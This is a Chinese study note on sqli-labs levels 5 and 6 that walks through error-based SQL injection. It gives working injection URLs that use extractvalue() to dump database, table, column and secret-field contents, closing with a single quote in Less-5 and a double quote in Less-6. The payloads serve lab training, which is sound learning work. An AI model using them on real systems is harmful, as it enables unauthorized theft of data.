sqli-labs靶场5~6笔记—报错注入

sqli-labs

Less-5

先正常访问

复制代码
http://sqli-labs/Less-5/?id=1

发现不再像1~4关回显用户名和密码。

由于没有回显位置,我们无法直接看到回显内容。

这里就需要尝试如:报错注入(看是否回显报错信息)、盲注(布尔盲注、时间盲注)、写入文件。

(这一关是报错注入)

1.判断注入点:

尝试单引号,发现报错。

复制代码
http://sqli-labs/Less-5/?id='
复制代码
http://sqli-labs/Less-5/?id=''

正常回显。

可知使用单引号闭合。

现在尝试extractvalue()报错注入是否可行。

复制代码
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,user()))--+

2.爆库

复制代码
#爆库
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)))--+

3.爆表

复制代码
#爆challenges库中的表
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

4.爆列

复制代码
#爆challenges库2m4sx0cpn5表中的列
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='2m4sx0cpn5')))--+

5.爆字段

复制代码
#爆challenges库2m4sx0cpn5表中的secret_NOQD列
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,(select group_concat(secret_NOQD) from challenges.2m4sx0cpn5)))--+

到此结束。

Less-6

与less5的差别就是闭合符号是双引号。

不再赘述。直接到最后一步吧

复制代码
#爆challenges库2m4sx0cpn5表中的secret_NOQD列
http://sqli-labs/Less-6/?id=" or extractvalue(1,concat(0x7e,(select group_concat(secret_NOQD) from challenges.2m4sx0cpn5)))--+
相关推荐
RainCity3 天前
Java Swing 自定义组件库分享(十二)
java·笔记·后端
LinXunFeng10 天前
Obsidian - 使用 Share Note 分享笔记并自部署
前端·笔记·github
闪闪发亮的小星星15 天前
高斯光以及高斯光公式解释
笔记
cqbzcsq15 天前
CellFlow虚拟细胞论文阅读
论文阅读·人工智能·笔记·学习·生物信息
阿米亚波15 天前
【Windows】QEMU 启动 openEuler aarch64/arm64 架构系统 + 离线软件源
linux·windows·经验分享·笔记·架构·arm
自传.15 天前
尚硅谷 Vibe Coding|第三章(1) Claude Code深度使用与进阶技巧 学习笔记
笔记·学习·尚硅谷·vibecoding
.千余15 天前
【C++】模板进阶全解:非类型参数|全特化|偏特化|分离编译完全指南
开发语言·c++·笔记·学习·其他
自传.15 天前
尚硅谷 Vibe Coding|第二章 AI编程工具生态 学习笔记
笔记·学习·ai编程·尚硅谷·vibe coding
秋波。未央15 天前
Java Agent 开发 · Day 1 学习笔记(含作业完整标准答案)
java·笔记·学习
中屹指纹浏览器15 天前
2026指纹浏览器字体指纹、字体渲染偏差检测与全维度虚拟字体池搭建方案
经验分享·笔记